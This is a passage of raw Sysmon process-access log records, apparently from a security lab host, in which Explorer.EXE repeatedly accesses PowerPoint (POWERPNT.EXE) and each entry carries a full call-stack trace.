Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft 